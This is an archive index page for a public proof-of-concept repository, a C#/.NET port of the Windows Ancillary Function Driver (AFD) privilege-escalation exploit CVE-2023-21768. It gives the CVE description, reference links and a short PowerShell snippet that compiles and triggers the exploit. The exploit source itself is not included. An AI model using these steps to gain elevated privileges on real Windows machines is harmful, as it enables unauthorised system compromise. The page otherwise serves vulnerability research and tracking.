CVE-2023-21768 PoC — Microsoft Windows Ancillary Function Driver for WinSock 安全漏洞

Source

https://github.com/xboxoneresearch/CVE-2023-21768-dotnet

Associated Vulnerability

Title:Microsoft Windows Ancillary Function Driver for WinSock 安全漏洞 (CVE-2023-21768)
Description:Microsoft Windows Ancillary Function Driver for WinSock是美国微软（Microsoft）公司的Winsock 的辅助功能驱动程序。 Microsoft Windows Ancillary Function Driver for WinSock存在安全漏洞。攻击者利用该漏洞可以提升权限。

Description

C# / .NET version of CVE-2023-21768

Readme

# CVE-2023-21768 - Dotnet

Dotnet / c# port of AFD-for-WinSock-EoP exploit

References:

- https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit
- https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768

## Why?

Sometimes you can't use compiled binaries.

## How to?

```powershell
$PWSH_PID = ([System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -ExpandProperty ID)
echo "[*] Current powershell PID: $PWSH_PID"
echo "[+] Compiling EoP exploit"
Add-Type -Path eop.cs -CompilerOptions "-unsafe"
echo "[+] Triggering exploit"
[XOR.EoP]::Run($PWSH_PID)
echo "[+] Exploit finished"
```

File Snapshot


 [4.0K]  /data/pocs/6d32bda0e0be4e1597d3e0013c1d2df016a7584d
├── [ 58K]  eop.cs
└── [ 622]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!